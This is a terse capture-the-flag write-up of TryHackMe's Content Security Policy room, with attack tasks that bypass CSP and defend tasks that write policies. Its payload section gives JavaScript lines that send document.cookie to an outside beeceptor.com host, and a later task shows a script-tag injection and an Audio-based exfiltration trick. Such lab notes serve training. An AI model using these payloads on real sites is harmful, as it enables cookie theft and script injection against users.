search

Content Security Policy Writeup

https://tryhackme.com/room/csp

hashtag
Blue Team

Evaluatorarrow-up-right

Hasherarrow-up-right

Generatorarrow-up-right

hashtag
Red Team

JSONP Bypassarrow-up-right

Exfiltratorarrow-up-right

hashtag
Payload

fetch(`https://randomcsp.free.beeceptor.com/${document.cookie}`)

eval(document.location='https://randomcsp.free.beeceptor.com/'.concat(document.cookie))

hashtag
Attack

hashtag
task 1

hashtag
task 2 (script-src data:)

The alternative way is using data:;base64,iVBORw0KGgo...

hashtag
task 3 (img-src *; script-src 'unsafe-inline')

hashtag
task 4 (style-src * 'self'; script-src 'nonce-abcdef')

hashtag
task 5 (JSONP endpoints, script-src 'unsafe-eval' *.google.com)

hashtag
task 6 (Trust CDN? script-src 'unsafe-eval' cdnjs.cloudflare.com)

CDN is way too generous. They're not only providing dependence for your website also for the hackers. When setting up the script-src directive and its sources, you should pay special attention to what you're allowing to load. If you're loading a script from an external source such as a CDN, make sure you're specifying the full URL of the script or a nonce/SHA hash of it and not just the hostname where it's hosted at, unless you're 100% sure no scripts that could be used to bypass your policy are hosted there. For example, if you're including jQuery from cdnjs on your website, you should include the full URL of the script script-src cdnjs.cloudflare.com/ajax/.../jquery.min.js or the SHA256 hash in your policy. Most CDNs allow you to get the script hash somewhere on their site.

https://cdnjs.com/arrow-up-right https://blog.0daylabs.com/2016/09/09/bypassing-csp/arrow-up-right

hashtag
task 7

After checking Evaluatorarrow-up-right

'self' can be problematic if you host JSONP, Angular or user-uploaded files.

media-src specifies the URLs from which video, audio and text track resources can be loaded from. Checking MDNarrow-up-right

This one is the hardest and the best.

1. The 404 pages will show up whatever you put in. means this one match can be problematic if you host JSONP, Angular or user uploaded files.

2. Need to understand how script-src 'self'; works. It means something like ip:3008/defend-1.js will be executed.

3. Then try to close the tag with '. <script src="/'; alert(1); '"></script> alert should just work.

4. What to do after the fetch, window.open and document.location is blocked by CSP? The answer is media-src new Audio

5. Use relative path for the 404 pages, also a browser won't block your input for Phishing

hashtag
Defend

hashtag
task 1

script-src 'self';

hashtag
task 2

script-src 'nonce-ae3b00';

hashtag
task 3 (Inline JS)

Hasherarrow-up-right to generate the hash for that inline javascript. script-src 'sha256-8gQ3l0jVGr5ZXaOeym+1jciekP8wsfNgpZImdHthDRo='

hashtag
Expand Knowledge

https://content-security-policy.com/#directivearrow-up-right

PreviousVulnversity (Privilege Escalation)

Last updated